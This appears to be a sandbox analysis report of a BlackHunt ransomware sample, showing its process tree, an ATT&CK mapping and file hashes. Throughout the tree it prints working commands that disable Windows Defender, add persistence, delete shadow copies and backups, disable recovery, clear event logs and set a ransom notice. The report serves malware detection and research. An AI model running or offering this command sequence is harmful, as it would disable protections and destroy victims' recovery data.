- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4276 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4852 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:1116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3972 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:3708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1236 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:3420
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵PID:3372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:3200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4456 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:3696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3140 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:4388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3184 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:4348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:4876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:3652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4520 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:3528
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:3332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1840
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:4528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2024
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3556
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2432
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:3300
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2300
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:5000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4784
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:3156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1492
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:700
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1412
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4996
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2012
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:3728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1740
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4792
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe" /F2⤵PID:1416
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe" /F3⤵
- Creates scheduled task(s)
PID:4984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:3192
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:4988
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:5008
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:4064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:372
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Modifies Windows Defender Real-time Protection settings
PID:3372
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:3928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4512
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:5540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:5020
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:5576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:4316
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:5568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1708
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:5552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:964
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:4608
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:5620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:1700
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:3500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:4800
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:1416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:5164
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:5688
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:5152
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:6060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:5692
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:5832
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:5612
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:5756
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:5212
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:5940
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:5964
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2888
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:6136
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:4744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:212
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:3904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:4196
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:4060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:1880
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:2528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:404
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:4948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:4356
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:3172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:5480
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:4020
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:3004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:2384 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:5148
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 14244⤵
- Program crash
PID:268
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe"2⤵PID:5324
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:5456
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5496
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:408
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1316
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:2320
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5148 -ip 51481⤵PID:5992
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD562af166a4ef29710b4be125111a99eb6
SHA1bb3ae1868b056871fc6f6ded7cae17093a19afea
SHA25628d434f4f5f200631902ece77c42ab81469b1512b202fd09fd94a74c3e870130
SHA512f8cd2fc392cbab2e1194437121d8c98762f55459995e3df70150b9718ab5d140c885aa85bf98b1db0a7f572faf390b183a77ee8c1ed22b980141fe4ccc468930
-
Filesize
684B
MD565f2120b06ea19f85ef05e0a38240cc3
SHA1f2d3826af0a7493548cfeda89773315213dd567c
SHA256773aee6f2705cebed97c758399d5b18e3686cc8433868b9dbeb37a9998b6074d
SHA51274748ada07f1044b203cb654b2c23b93be9b0590d5aed0333fa0cc9ba5405f03691e3601d1e7e44b7e972c6fd2997dc7f8db62d2124e4e0c8d4de925b3d8ee5b
-
Filesize
1KB
MD573e824b02eff00060e1db12321391200
SHA1fcb346ce5a937833c8c699e9c535d854a3f50a81
SHA256c7a552fef2c1880570c2ba43c6c125587ae13c40dec79419a2137f0e8b8ee909
SHA5121fd8397ffc1518bfb76e6b7b29116491ed2f3a1e0daecba87f7e6dfc63f68add75e8597affe3e5c2e61577067e86af5b3ed9f7e8e9a4d980ffec4a082ee88f83